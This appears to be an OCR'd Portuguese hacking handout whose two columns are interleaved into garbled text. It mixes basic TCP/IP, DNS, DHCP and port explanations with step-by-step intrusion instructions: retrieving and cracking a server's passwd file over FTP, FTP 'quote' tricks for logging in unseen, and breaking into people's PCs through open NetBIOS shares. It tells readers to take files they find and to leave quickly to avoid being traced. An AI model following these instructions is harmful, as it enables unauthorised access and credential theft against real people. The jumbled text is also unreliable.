WINDOWS 95/98, QUE APARENTEMENTE NÃO OFERECE CONTÉM A SENHA, MAS DEPOIS VICÊ PODERÁ FAZER O
SERVIÇO NENHUM, TEM PORTAS ABERTAS. QUE QUISER EM OUTRO PROVEDOR.
DIGITE LS –AFL PARA LISTAR TODOS OS ARQUIVOS E
A COLETA DE DADOS DIRETÓRIOS DO PROVEDOR.
UM ATAQUE BEM SUCEDIDO A UM COMPUTADOR É SE HOUVER O DIRETÓRIO ETC, DIGITE CD ETC, PARA
AQUELE QUE EXPLORA A VULNERABILIDADE EXISTENTE MUDAR O DIRETÓRIO, SE NÃO TIVER DIGITE CLOSE.
EM UM PROGRAMA OU SERVIÇO RODANDO NA MÁQUINA. DIGITE LS –LA. SE HOUVER O ARQUIVO PASSWD DIGITE
COMO JÁ DISSEMOS ANTES, A MAIORIA DOS SERVIÇOS É GET PASSWD, SE NÃO DIGITE CLOSE.
ACESSADO ATRAVÉS DA CAMADATCP/IP, E SÃO
IDENTIFICADOS POR UM NÚMERO DE PORTA. ATAQUES AO PRONTO. TERMINADA A INVASÃO PEGUE O PROGRAMA
PRÓPRIO MECANISMO DE MANIPULAÇÃO DO PROTOCOLO JACK QUE TIRA AS SENHAS DO ARQUIVO.
DO TCP/IP TAMBÉM SÃO FREQUENTES, COMO IREMOS
VER A SERGUIR. COLOCANDO NO PW FILE: PASSWD E NA OUTRA ENTRADA
DE DADOS, QUE EU ESQUECI O NOME COLOQUE A SUA
PARA QUE UM INVASOR POSSA EXPLORAR AS FALHAS DA WORDLIST.
SERGURANÇA NOS VÁRIOS SISTEMAS DE SUA MÁQUINA,
ELE PRECISA SABER ANTES O QUE ESTÁ DISPONÍVEL. SE VOCÊ NÃO TIVER NENHUM PROGRAMA DE FTP USE O
EXSTEM DOIS MÉTODOS BASTANTE UTILIZADOS PARA DO MS-DOS. VÁ AO PROMPT E DIGITE FTP. IRÁ APARECER
ESTE TIPO DE COLETA DE DADOS. A VARREDURA DE O PROMPT FTP>, DIGITE OPEN, IRÁ ABRIR OUTRO
PORTAS (PORT SCAN) E A IMPRESSÃO DIGITEL PROMPT. DITE ENTÃO O ENDEREÇO DO HOST PU O SEU IP.
(FINGERPRINT) DO SISTEMA OPERACIONAL.
AO CONECTAR ELE PEDIRÁ A SENHA E A PASSWORD,
PORT SCANS TENTE USAR OS PASSWORDS DO UNIX, SE NÃO DER VOCÊ
PODE ENTRAR INVISÍVEL. COMO EMTRAR INVISÍVEL?
USANDO PROGRAMAS ESPECIAIS, O INVADOR LANÇA
SONDAS (PACOTES IP ESPECIAIS), TENTANDO NOLOGIN PRECIONE ENTER, NO PASSWORD PRECIONE
ESTABELECER CONEXÕES COM CADA UMA DAS 65535 NOVAMENTE. DEPOIS DIGITE "QUOTE USER FTP", DÊ UM
PORTAS DO SEU COMPUTADOR. SE EXISTE ALGUM ENTER E DIGITE "QUOTE CWD~ROOT", PRECIONE ENTER
SERVIÇO ASSOCIADO A ALGUMA PORTA, ELE IRÁ NOVAMENTE E DIGITE "QUOTE PASS FTP". PRONTO, VOCÊ
RESPONDER. DESTA MANEIRA, O INVASOR CONSEGUE ESTÁ HACKEANDO...
SABER, EM POUCOS SEGUNDOS, O QUE ESTÁ RODANDO
EM SUA MÁQUINA. NÃO TENTE HACKEAR USANDO O USER NORMAL DE FTP´S,
QUE É LOGIN ANONYMOUS PASSWORD E-MAIL, POIS SERÁ
IMPRESSÃO DIGITAL APLICADO O MODO DE PROTEÇÃO...

ATRAVÉS DO ENVIO DE UMA SEQUENCIA ESPECIAL DE MEU DEUS, EU ENTREI, E AGORA O QUE EU FAÇO?
PACOTES IP A UM SITE ESPECÍFICO, PODE-SE DETECTAR
QUE SISTEMA OPERACIONAL ESTÁ RODANDO AO ENTRAR VOCÊ VAI ESTAR NO DIRETÓRIO DO LOGIN,
ANALIZANDO OS PACOTES QUE ELE ENVIA DE VOLTA. COM TIPO HOMEROOT. DAÍ, PARA VER A LISTA DE USERS VOCÊ
POSSE DESSAS INFORMAÇÕES, ELE JÁ SABE QUE VOLTA UM DIR E DIGITE DIRHOME, E CADA DIR É UM
FERRAMENTAS UTILIZAR PARA TENTAR INVADIR OU USUÁRIO. NÃO TENTEM PEGAR AS SENHAS POIS ESTÃO
VANDALIZAR O SEU MICRO. E É NESTE PONTO QUE VOCÊ CRIPTOGRAFADAS, POIS A MAIORIA DOS USERS USA A
DEVE PRESTAR MUITA ATENÇÃO. QA INFORMAÇÃO É A MESMA SENHA LOGIN. SE VOCÊ NÃO SOUBER OS
ALMA DO NEGÓCIO. A INVASÃO DE SISTEMAS É COMANDOS DE FTP, DIGITE ? E TECLE ENTER. DAÍ, É SÓ
BASICAMENTE UMA TAREFA DE PESQUISA E COLETA DE HACKEAR. NUNCA FIQUE MAIS DO QUE 5 MINUTOS EM UM
DADOS. QUANTO MAIS INFORMADO E ATUALIZADO VOCÊ PROVEDOR, SE NÃO ELE CAÇARÁ O SEU IP, DAÍ É
ESTIVER, MENOS CHANCES TERÁ DE RECEBER UM CADEIA!!!!!!.
ATAQUE NO FUTURO.
FTP DO DOS
INVADINDO FTP´S COMANDOS
ATAQUE POR FTP (ML HACKING) FUNÇÕES

INGREDIENTES: APPEND
ACRESCENTAR UM ARQUIVO
COMPUTADOR LIGADO À INTERNET
ASCII
DEFINIR UM TIPO DE TRANFERÊNCIA ASCII PUT
ENVIAR UM ARQUIVO
BELL
EMITIR UM AVISO SONORO AO TÉRMINO DO COMANDO PWD
IMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTA
BINARY
DEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA QUIT
TERMINAR A SESSÃO DE FTP E SAIR
BYE
TERMINAR SEÇÃO DE FTP E SAIR QUOT
ENVIAR UM COMANDO ARBITRÁRIO
CD
ALTERAR A PASTA DE TRABALHO REMOTA RECV
RECEBER ARQUIVO
CLOSE
TERMINAR SESSÃO DE FTP REMOTEHELP
OBTER AJUDA A PARTIR DO SERVIDOR REMOTO
DELETE
EXCLUIR PASTAS DE TRABALHO REMOTA RENAME
RENOMEAR ARQUIVO
DEBUG
LIGAR/DESLIGAR MODO DE DEPURAÇÃO RMDIR
REMOVER PASTA DA MÁQUINA REMOTA
DIR
LISTAR CONTEÚDO DA PASTA REMOTA SEND
ENVIAR ARQUIVO
DISCONNECT
TERMINAR SESSÃO DE FTP STATUS
MOSTRAR STATUS ATUAL
GET
RECEBER ARQUIVO TRACE
LIGAR/DESLIGAR RASTREAMENTO DE PACOTES
GLOB
LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE TYPE
ARQUIVOS LOCAIS DEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOS

HASH USER
LIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER ENVIAR INFORMAÇÕES DE NOVO USUÁRIO
TRANSFERIDO
VERBOSE
HELP
AJUDA DO FTP Invasão por IP
Passa-a-passo: 1º- Certifique-se de que você possui este
LCD programa nbstat:
ALTERAR A PASTA DE TRABALHO LOCAL
2º- Vá ao Prompt do MS-DOS.
LITERAL
ENVIAR UM COMANDO DE FTP ARBITÁRIO 3º- Digite: nbtstat -a o IP do cara que você quer invadir

LS 4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as


LISTAR O CONTEÚDO DA PASTA REMOTA pastas do PC dela. Se não aparecerá : Host Not Found (o foda é
que não da para invadir o computador de certos caras por causa
MDELETE disso então não se entusiasme tanto pois só da para invadir
EXCLUI VÁRIOS ARQUIVOS aquelas pessoas que tem no PC compartilhamento de arquivos
as pastas)
MDIR
LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS 5º- Caso apareça um monte de nomes esquisitos com isso
antes : "<03>", você deve pegar o nome do negócio que estiver
M GET com <03> atrás do nome.
OBTER VÁRIOS ARQUIVOS
6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O
MKDIR IP do cara NetBios dele . O NetBios é aquele nome esquisite que
CRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTA tem o atras. (Digite exatamente daquela forma que eu digitei)

MLS 7º- Mapeie sua unidade de disco de forma que a máquina do


LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS cara se torne parte de seu PC.

MPUT 8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha


ENVIAR VÁRIOS ARQUIVOS "OK"

OPEN 9º- Pronto! Você invadiu por IP!


CONECTAR AO FTP REMOTO
10º- Conselho : Nunca apague nem modifique NADA somente
PROMPT fuce bastante nas coisas do lammaH e se achar algo
FORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOS interessante pega para você. OBS: Tem algumas pessoas que
renomeiam o arquivo vnbt.386 no windowssystem para que se DE IP É DIVIDO EM DUAS PARTES: O ENDEREÇO DA REDE
alguem tente te nukar ou invadir não consiga... ; pois bem você EO ENDEREÇO DA SUBREDE. CONSIDERE O NÚMERO DE
vai ter que renomear o seu arquivo senão não da para invadir. IP DA SEGUINTE FORMA: W.X.Y.Z.

PROTOCOLOS DE REDE CLASSE


TCP/IP SE REFERE AO CONJUNTO DE PROTOCOLOS N º DE IP
USADOS NA INTERNET. ELE INCLUI UMA SÉRIE DE INDICADOR DA REDE
PADRÕES QUE ESPECIFICAM COMO OS COMPUTADORES INDICADOR DA SUB REDE
VÃO SE COMUNICAR E CRIA CONVENÇÕES PARA NºDE REDES DISPONÍVEIS
INTERCONECTAR REDES PARA O ROUTEAMENTO NºDE SUB REDES DISPONÍVEIS
ATRAVÉS DESSAS CONEXÕES.
A
OS PROTOCOLOS DA INTERNET (IP), SÃO UM RESULTADO 1.126
DO PROJETO DA DARPA, SOBRE CONECTIVIDADE ENTRE w
REDES NO FINAL DOS ANOS 70. ELE FOI UTILIZADO EM x.y.z
TODAS AS REDES DE LONGA DOSTÂNCIA DO SISTEMA DE 126
DEFESA DOS EUA EM 1983, MAS NÃO FOI RAPIDAMENTE 16,777,214
ACEITO ATÉ SER INCORPORADO AO BSD UNIX 4.2.
B
A POPULARIDADE DO TCP/IP É BASEADO EM: 128.191
w.x
ESTRUTURA CLIENTE SERVIDOR ROBUSTA: O TCP/IP É y.z
UMA ÓTIMA PLATAFORMA CLIENTE SERVIDOR, 16,384
ESPECIALMENTE EM AMBIENTES WAN. 65,534

COMPARTILHAMENTO DE INFORMAÇÕES: MILHARES DE C


INFORMAÇÕES MILITARES, EDUCACIONAIS, CIENTÍFICAS, E 192.223
COMERCIAIS COMPARTILHAM DADOS, CORREIO w.x.y
ELETRÔNICO E OUTROS SERVIÇOS DA INTERNET USANDO z
O TCP/IP. AMPLA DISPONIBILIDADE. IMPLEMENTAÇÕES DO 2,097,151
TCP/IP ESTÃO DISPONÍVEIS EM PRATICAMENTE TODOS OS 254
SISTEMAS OPERACIONAIS POPULARES. SEU CÓDIGO É
AMPLAMENTE DISPONÍVEL EM VÁRIAS IMPLEMENTAÇÕES. OBS: O ENDEREÇO 192.168 É RESERVADO PARA USO EM
FABRICANTES DE BRIDGES, ROUTERS E ANALIZADORES REDES INTERNAS, O ENEREÇO 127 É UTILIZADO PARA
DE REDES OFERECEM SUPORTE PARA O TCP/IP EM SEUS TESTES DE LOOP BACK E OS ACIMA DE 224 SÃO
PRODUTOS. RESERVADOS PARA PROTOCOLOS ESPECIAIS.

CONCEITOS UMA SUB REDE É UMA REDE LIGADA DIRETAMENTE


ATRAVÉS DE UMA REDE PERTENCENTE À INTERNET. A
EXISTEM ALGUNS CONCEITOS QUE SÃO IMPRECINDÍVEIS REDE PERTENCENTE RECEBE UM NÚMERO DE IP E
EM RELAÇÃO AO TCP/IP E DE REDES QUE O UTILIZAM. DITRIBUI O NÚMERO DE IP DENTRO DE SUA SUB REDE. AS
CLASSES APENAS DEFINEM QUEANTAS SUB REDES UM
NÚMERO NÚMERO DE IP TEM. DE ACORDO COM A TABELA, EXISTEM
126 NÚMEROS DE IP DQA CLASSE A E CADA UM DELES
EXISTEM ALGUMAS ANALOGIAS ENTRE COMPUTADORES E PODE TER CERCA DE 16.777.214 SUB REDES. VOCÊ LOGO
TELEFONES E O NÚMERO DE IP É UMA DELAS. VOCÊ PODE PODE IMAGINAR QUE NÃO EXISTAM ENDEREÇOS DE
IMAGINAR O NÚMERO DE IP COMO UM NÚMERO DE CLASSE A E B NA INTERNET, E QUE OS DA CLASSE C
TELEFONE COM TODOS OS CÓDIGOS DE DISCAGEM ESTÃO ACABANDO, A IETF ESTÁ ESTUDANDO A EXPANSÃO
INTERNACIONAL. ISTO SE SIGNIFICA QUE QUALQUER DESSES NÚMEROS.
MÁQUINA PODE SE CONECTAR A OUTRO USANDO O
NÚMERO DE IP, BASTADO QUE EXISTA APENAS UM AS MÁSCARAS DE SUB REDE IDENTIFICAM A CLASSE DO
CAMINHO ENTRE AS DUAS. ALÉM DISSO, TODA MÁQUINA NÚMERO DE IP. A PRIMEIRA VISTA PARECE
NA REDE TEM DE TER UM NÚMERO DE IP. DESNECESSÁRIO, POIS BASTA OLHAR O PRIMEIRO
NÚMERO DO IP PARA DETERMINAR A CLASSE. MAS
ISTO TAMBÉM SIGNIFICA QUE DUAS MÁQUINAS NA MESMA ACONTECE QUE UM NÚMERO DE IP DA CLASSE A PODE
REDE NÃO PODEM TER O MESMO NÉMERO DE IP. ESTA FUNCIONAR COMO UM DA CLASSE B OU CLASSE C,
RESTRIÇÃO SÓ OCORRE PARA MÁQUINAS NA MESMA DEPENDENDO DA ESTRUTURA INTERNA DA SUA SUB
REDE, POIS MÁQUINAS NUMA REDE NÃO CONECTADA REDE. UM EXEMPLO: IMAGINE UMA EMPRESA COM 200
USUALMENTE TEM NÚMERO DE IP IGUAIS, POR ALGUMAS FILIAIS NO BRASIL CONECTADAS POR UMA REDE PRÓPRIA.
CAUSAS TÉCNICAS. NO CASO DA ANALOGIA COM A MATRIZ TEM UM NÚMERO DE IP DE CLASSE A, DIGAMOS
TELEFONES, IMAGINE DUAS PESSOAS MORANDO EM 100 E DISTRIBUI AS SUAS SUB REDES DA SEGUINTE
PAÍSES DIFERENTES QUE POSSUAM O MESMO NÚMERO FORMA:
DE TELEFONES (APENAS OS NÚMEROS LOCAIS). NESSE
CASO NÃO HÁ CONFLITO. 100.1.0.0
Matriz
O NÚMERO DE IP TEM 4 BYTES DE TAMANHO E TEM UM
FORMATO ESPECÍFICO XXX.XXX.XXX.XXX (EXEMPLO: 100.2.0.0
200.212.235.122). ISSO SIGNIFICA QUE CADA Filial 1
AGRUPAMENTO PODE IR DE 0 À 255 (POIS ESSA É A
CAPACIDADE DE 1 BYTE) 100.3.0.0
Filial 2
MÁSCARA
100.201.0.0
EXISTEM TRÊS CLASSES DE ENDEREÇOS IP: CLASSES A, Filial 200
B, C. A DIFERENÇA ENTRE AS CLASSES É A FORMA DE
COMO O ENDEREÇO DE IP É INTERPRETADO. O NÚMERO
REDES (O GATEWAY), PARA CASO DE O NOME
REQUISITADO NÃO EXISTIR NA REDE LOCAL , O DNS
POSSA PEDIR AO SERVIDOR DNS DA OUTRA REDE PARA
PARA AS FILIAIS, O NºDE IP (EX: 100.201.0.0) É DE CLASSE PESQUISAR O TAL NOME.
B, POIS SÓ TEM 16.384 SUBREDES DISPONÍVEIS, EMBORA
COMECE COM 100. DENTRO DAS FILIAIS AINDA É POSSÍVEL O WINDOWS NT OFERECE UM SERVIÇO SEMELHANTE, O
SE DISTRIBUIR SUB REDES, AS QUAIS TERIAM NÚMEROS WINS (WINDOWS INTERNET NEME SYSTEM OU SISTEMA DE
DE IP CLASSE C. NOMES DA INTERNET DO WINDOWS). A PRINCIPAL
DIFERENÇA ENTRE OS DOIS É QUE O DNS USA UMA
PARA QUE O ROTEAMENTO FUNCIONE CORRETAMENTE, TABELA ESTÁTICA, E O WINS USA UMA TABELA DINÂMICA.
OS COMPUTADORES PRECISAM SABER QUAL A CLASSE NO CASO DO SERVIDOR DNS RODAR NUMA MÁQUINA DO
DO NÚMERO DE IP, E ELAS SÃO AS SEGUINTES: WINDOWS NT É RECOMENDÁVEL QUE ELE SEJA
SUSTIUÍDO PELO WINS.

Classe DHCP
Máscara de Sub-rede MAIS UM CASO DE LETRAS QUE NÃO SIGNIFICAM NADA
PARA A MIORIA DOS USUÁRIOS. MAS INFELIZMENTE NÃO
A EXISTE UMA BOA ANALOGIA PARA O DHCP, PORTANTO
255.0.0.0 VAMOS DIRETO AO ASSUNTO. DHCP SIGNICA "DINAMIC
HOST CONFIGURATION PROTOCOL", OU SEJA:
B PROTOCOLO DE CONFIGURAÇÃO DE HOST DINÂMICO.
255.255.0.0 NIAM REDE TCP/IP, TODO COMPUTADOR, TODO
COMPUTADOR TEM DE TER UM IP DISTINTO. ISSO
C SIGNIFICA QUE ANTES DE COLOCAR UMA NOVA MÁQUINA
255.255.255.0 NA REDE, O ADMINISTRADOR TERIA DE IDENTIFICAR
QUAIS NÚMEROS ESTÃO SENDO UTILIZADOS PARA
GATEWAY ESCOLHER UM NÚMERO ADEQUADO PARA A NOVA
GATEWAY PADRÃO É A MÁQUINA PÁRA QUEM PEDIMOS MÁQUINA. EM PEQUENAS REDES ISSO É POSSÍVEL SER
AJUDA QUANDO NÃO CONSEGUIMOS ACHAR UMA OUTRA FEITO, MAS EM GRANDES REDES ISSO SE TORNA UMA
MÁQUINA NA REDE. FUNCIONA ASSIM: QUANDO UMA TAREFA TEDIOSA E SUJEITA A FALHAS. PARA EVITAR ISSO
MÁQUINA DA REDE PRECISA SE COMUNICAR COM OUTRA, FOI CRIADO O DHCP. QUANDO UMA MÁQUINA ENTRA NA
ELA EMITE UM PEDIDO DE CONEXÃO (ESSE PEDIDO É REDE, ELA PROCURA O SERVIDOR DHCP (CUJO NÚMERO
FEITO ATRAVÉS DO BROADCASTING, OU SEJA, A MÁQUINA DE IP FOI PREVIAMENTE FORNECIDO) E SOLICITA UM
QUE ENVIA O PEDIDO A TODA A REDE, E APENAS A NÚMERO DE IP PARA SI PRÓPRIA. O SERVIDOR VERIFICA
MÁQUINA DESTINO RESONDE), E AGUARDA UMA QUAL O NÚMERO DISPONÍVEL, INFORMA AO SOLICITANTE
RESPOSTA. SE ELA NÃO VIER, ELA ENTRA EM CONTATO ESSE NÚMERO E O TORNA INDISPONÍVEL PARA FUTURAS
COM O GATEWAY PADRÃO E SOLICITA QUE O MESMO SOLICITAÇÕES. DESSA MANEIRA A ADMINISTRAÇÃO DOS
CONECTE COM A MÁQUINA DESTINO. SE O GATEWAY NÚMEROS DE IP SÃO FEITAS AUTOMATICAMENTE E NÃO
CONSEGUIR CONECTAR À MÁQUINA DESTINO, ELE FICA EXISTEM PROBLEMAS DE CONFLITO. QUANDO A MÁQUINA
COMO INTERMEDIADOR DESSA CONEXÃO, CASO SOLICITANTE SAI DA REDE, O SERVIDOR DHCP TORNA
CONTRÁRIO, ELE VISA A MÁQUINA SOLICITANTE QUE NÃO ESSE NÚMERO DISPONÍVEL NOVAMENTE.
FOI POSSÍVEL ENCONTRAR A MÁQUINA DESTINO. ESSA
ESTRUTURA DE PROCURA VISA DIMINUIR O TRÁFEGO PORTAS
DESNECESSÁRIO NA REDE. IMAGINE SÓ SE TODA A UMA PORTA PODE SER VISTA COMO UM CANAL DE
CONEXÃO REALIZADA NA INTERNET (E TODAS AS REDES COMUNICAÇÕES PARA UMA MÁQUINA. PACOTES DE
CONECTADAS A INTERNET) FOSSE ENVIADA A TODOS OS INFORMAÇÕES CHEGANDO A UMA MÁQUINA NÃO SÃO
COMPUTADORES LIGADAS A ELA. SERIA UM TRÁFEGO APENAS ENDEREÇADAS À MÁQUINA, E SIM A MÁQUINA
MUITO GRANDE. AO INVÉS DISSO, O BROADCAST É NUMA DTERMINADA PORTA. VOCÊ PODE IMAGINAR UMA
DIVIDIDO EM NÍVEIS, PRIMEIRO NA LAN (LOCAL AREA PORTA COMO SENDO UM CANAL DE RÁDIO, COM A
NETWORK OU REDE LOCAL) DEPOIS NA WAN DE SUA DIFIRENÇA FUNDAMENTAL DE QUE UM COMPUTADOR
CIDADE OU ESTADO, DEPOIS NA WAN NACIONAL ATÉ PODE "OUVIR" TODOS OS 65000 CANAIS POSSÍVEIS AO
CHEGAR NA WAN INTERNACIONAL. REDUZ-SE DESSE MESMO TEMPO.
MODO TODO O TRÁFEGO INTERNO ÀS WANS E LANS
ALIVIANDO AS LINHAS DE CONEXÃO. ENTRETANTO, UM COMPUTADOR GERALMENTE NÃO ESTÁ
OUVINDO EM TODAS AS PORTAS, ELE ESCUTA A ALGUMAS
DNS PORTAS ESPECÍFICAS. E ELE NÃO VAI RESPONDER A UM
ESSAS 3 LETRAS NÃO SEIGNIFICAM MUITO PARA A PEDIDO A UMA PORTA QUE ELE NÃO ESTEJA ESCUTANDO.
MAIORIA DAS PESSOAS, MAS ELAS DIGNIFICAM DOMAIN
NAME SYSTEM. ESSAS 3 PALAVRAS TAMBÉM NÃO EXISTEM UMA SÉRIE DE PORTAS PRÉ DEFINIDAS PARA
SIGNIFICAM COISA ALGUMA PARA A MIORIA DAS PESSOAS, CERTOS SERVIÇOS QUE SÃO ACEITOS UNIVERSALMENTE.
POR ISSO, VAMOS À ANALOGIA COM O TELEFONE. AS PRINCIPAIS SÃO:
QUANDO VOCÊ DESEJA TELEFONAR PARA A LOJA DA
ESQUINA, VOCÊ CONSULTA O CATÁLOGO, DESCOBRE O SERVIÇO
TELEFONE DE LÁE LIGA. VOCÊ NÃO CONSEGUE PORTA
TELEFONAR PARA ALGUM LUGAR SE NÃO SOUBER O DESCRIÇÃO
NÚMERO. NA REDE TCP/IP ACONTECE A MESMA COISA. OS
USUÁRIOS NÃO DECORAM O NÚMERO DE IP DAS FTP
MÁQUINAS, E SIM OS NOMES. MAS PARA SE ALCANÇAR 21
UMA MÁQUINA NA REDE PRECISAMOS DO SEU NÚMERO PROTOCOLO DE TRANSFERÊNCIA DE ARQUIVOS
DE IP. PARA RESOLVER ISSO FOI CRIADO O DNS, UM
SERVIÇO DISPONÍVEL NA REDE QUE, DADO UM NOME DE TELNET
MÁQUINA, ELE RETORNA O NÚMERO DE IP DA MESMA. 23
EXISTE UMA PARTICULARIDADE AQUI. NO CASO DA REDE PARA SE CONECTAR REMOTAMENTE A UM SERVIDOR
LOCAL ESTAR CONECTADA A ALGUMA OUTRA, É
RECOMENDÁVEL QUE O SERVIDOR DNS, SEJA SMTP
EXECUTADO NA MÁQUINA DE LIGAÇÃO ENTRE AS DUAS 25
PARA ENVIAR UM EMAIL LAN O IP 192.168.X.X , QUE , QUANDO DA DETERMINAÇÃO
DOS NÚMEROS DE IP FOI RESERVADO PARA O USO DE
GOPHER REDES INTERNAS, OU SEJA, NENHUMA MÁQUINA LIGADA
70 DIRETAMENTE A INTERNET TEM UM IP 192.168.X.X. ISSO É
BROWSER BASEADO EM MODO TEXTO NECESSÁRIO POIS COMO JÁ VIMOS NENHUMA MÁQUINA
PODE TER UM NÚMERO DE IP QUE JÁ ESTEJA SENDO
HTTP UTILIZADO POR UMA OUTRA MÁQUINA.
80
PROTOCOLO WWW – NETSCAPE, MOSAIC O GATEWAY TEM DUAS INTERFACES DE REDE, UMA PARA
SE CONECTAR À INTERNET E OUTRA PARA SE CONECTAR
POP3 À LAN. A INTERFAE DA INTERNET É ATRIBUIDO O NÚMERO
110 DE IP VÁLIDO NA INTERNET E NA LAN O NÚMERO DE IP DO
PARA RECEBER EMAIL TIPO 192.168.X.X (USUALMENTE 192.168.0.1). NAS
MÁQUINAS DA LAN O NÚMERO DO IP É DO TIPO 192.168.X.X
NNTP (ONDE O PRIMEIRO X É O MESMO DO GATEWAY) E O
119 GATEWAY DEFALT É O IP DO GATEWAY VOLTADO PARA A
NEWS GROUPS LAN (192.168.X.X). DESSA FORMA PODEMOS TER ATÉ
16.384 MÁQUINAS NA INTERNET POR NÚMERO DE IP
IRC VÁLIDO. ESSA ESTRUTURA TAMBÉM FACILITA A ADOÇÃO
6667 DE MEDIDAS DE SEGURANÇA CONTRA INTRUSOS DA
INTERNET RELAY CHAT – BATE PAPO ONLINE INTERNET, POIS COMO TODO O TRÁFEGO NA INTERNET
PASSA PELO GATEWAY, BASTA PROTEGÊ-LO PARA
COMPUSERV PROTEGER TODA A LAN.
4144
COMPUSERV WINCIM PROTOCOLOS
TCP E IP: O TCP E O IP SÃO APENAS DOIS MEMBROS DA
AOL FAMÍLIA TCP/IP. IP É UM PROTOCOLO QUE PROVIDENCIA A
5190 ENTREGA DE PACOTES PARA TODOS OS OUTROS
AMERICA ONLINE PROTOCOLOS DA FAMÍLIA TCP/IP. O IP FORNECE UM
SISTEMA DE ENTREGA DE DADOS SEM CONEXÃO. ISTO É,
MSN OS PACOTES IP NÃO SÃO GARANTIDOS DE CHEGAREM AO
569 SEU DESTINO, NEM DE SEREM RECEBIDOS DA FORMA QUE
MICROSOFT NETWORK FORAM ENVIADOS. O CHECK SUN DO IP CONFIRMA
APENAS A INTEGRIDADE DO CABEÇALHO DO PACOTE.
OUTROS DESTA MANEIRA, A RESPONSABILIDADE PELOS DADOS
OUTROS CONTIDOS NO PACOTE DO IP (E SUA SEQUÊNCIA) É
OUTROS TAREFA DE PROTOCOLOS DE MAIS ALTO NÍVEL.

ROTEADOR: É UM COMPUTADOR QUE É UTILIZADO PARA TALVEZ O PROTOCOLO DE MAIS ALTO NÍVEL DO IP SEJA O
CONECTAR DUAS OU MAIS REDES DISTINTAS. ELE TEM TCP. O TCP OFERECE UM CONFIÁVEL PROTOCOLO
ESSE NOME PORQUE TEM DE ROTEAR (OU DIRECIONAR) BASEADO EM CONEXÃO CAPSULADO NO IP. O TCP
OS PACOTES DE UMA REDE PARA OUTRA, ATUANDO GARANTE A ENTREGA DOS PACOTES, ASSEGURA O
COMO UM GUARDA DE TRÂNSITO PARA OS PACOTES SEQUENCIAMENTO DOS PACOTES E PROVIDENCIA UM
ENTRE AS REDES. CHECKSUN QUE VALIDA TANTO O CABEÇALHO QUANTO
OS DADOS DO PACOTE. NO CASO DA REDE PERDER OU
GATEWAY: O GATEWAY TAMBÉM É UM COMPUTADOR QUE CORROMPER UM PACOTE TCP/IP DURANTE A
SERVE PARA CONECTAR DUAS OU MAIS REDES TRANSMISSÃO, É TAREFA DO TCP RETRANSMITIR O
DISTINTAS. A PRINCIPAL DIFERENÇA PARA O ROTEADOR É PACOTE FALTOSO OU INCORRETO. ESSA CONFIABILIDADE
QUE O GATEWAY NÃO TEM UM HARDWARE ESPECIAL TORNA O TCP/IP O PROTOCOLO ESCOLHIDO PARA
PARA O ROTEAMENTO. USUALMENTE OS GATEWAYS TRANSMISSÕES BASEADAS EM SESSÃO, APLICATIVOS
CONECTAM LANS E OS ROTEADORES, WANS. EM VÁRIOS CLIENTE-SERVIDOR E SERVIÇOS CRÍTICOS COMO
CASOS SE UTILIZA UM ROTEADOR EM CONJUNTO COM O CORREIO ELETRÔNICO.
GATEWAY.
PORÉM, ESSA CONFIABILIDADE TEM UM PREÇO. OS
VISÃO: UMA REDE UTILIZANDO O TCP/IP TEM UMA CABEÇALHOS DOS PACOTES TCP REQUEREM USO DE
ESTRUTURA BÁSICA COMPOSTA POR UM OU MAIS BITS ADICIONAIS PARA ASSEGURAR O CORRETO
SERVIDOR RODANDO UM SERVIDOR DNS (OU WINS), SEQUENCIAMENTO DA INFORMAÇÃO, BEM COMO UM
DHCP, SMTP, POP3, E OS SERVIDORES DOS SERVIÇOS CHECK SUN OBRIGATÓRIO PARA GARANTIR A
DESEJADOS (HTTP, TELNET, GOPHER, ETC) E AS MÁQUINA INTEGRIDADE DO CABEÇALHO E DOS DADOS. PARA
CLIENTES SOLICITANDO ESSES SERVIÇOS. PARA SE GARANTIR A ENTREGA DOS PACOTES, O PROTOCOLO
INTERLIGAR ESSA REDE A OUTRA REDE TCP/IP, SE FAZ TAMBÉM REQUER QUE O DESTINATÁRIO INFORME O
NECESSÁRIO O USO DE UM ROTEADOR OU GATEWAY E DA RECEBIMENTO DO PACOTE.
CORRETA CONFIGURAÇÃO DA REDE.
TAL INFORMÇÃO DE RECEBIMETO (OU ACKS) GERAM
EXISTEM DUAS MANEIRAS DE SE LIGAR A LAN À INTERNET: TRÁFEGO ADICIONAL NA REDE, DIMINUINDO A TAXA DE
TRANFERÊNCIA DE DADOS EM FAVOR DA
ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA CADA CONFIABILIDADE. PARA REDUZIR O IMPACTO NA
MÁQUINA NA REDE, O QUE PODE SER IMPOSSÍVEL PARA PERFORMANCE, A MIORIA DOS SERVIDORES ENVIAM UM
REDES COM MUITAS MÁQUINAS. ACK PARA TODOS (AO INVÉS DE TODO O PACOTE) OU
QUANDO UM ACK EXPIRA.
ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA O GATEWAY
E UTILIZANDO-SE O NÚMERO DE IP 192.168.X.X
INTERNAMENTE.
UDP: SE A CONFIABILIDADE NÃO É ESSENCIAL, O UDP
COMO O SEGUNDO CASO É O MAIS FACTÍVEL, VAMOS (USER DATAGRAM PROTOCOL), UM COMPLEMENTO DO
OBERVÁ-LO MELHOR. NELE, SE UTILIZA INTERNAMENTE A TCP, OFERECE UM SERVIÇO DE TRANSMISSÃO DE DADOS
SEM CONEXÃO QUE NÃO GARANTE NEM A ENTREGA NEM
A CORRETA SEQUENCIA DOS PACOTES ENVIADOS (BEM O final da apostila chegou, espero que tirem bom aproveito dela.
PARECIDO COM O IP). CHECKSUNS NO UDP SÃO
OPCIONAIS OFERECENDO ASSIM UMA MANEIRA DE SE
TROCAR DADOS EM UMA REDE ALTAMENTE CONFIÁVEL
SEM CONSUMIR DESNECESSARIAMENTE RECURSOS DA
REDE.

ARP E ICMP: DOIS OUTROS PROTOCOLOS DA FAMÍLIA


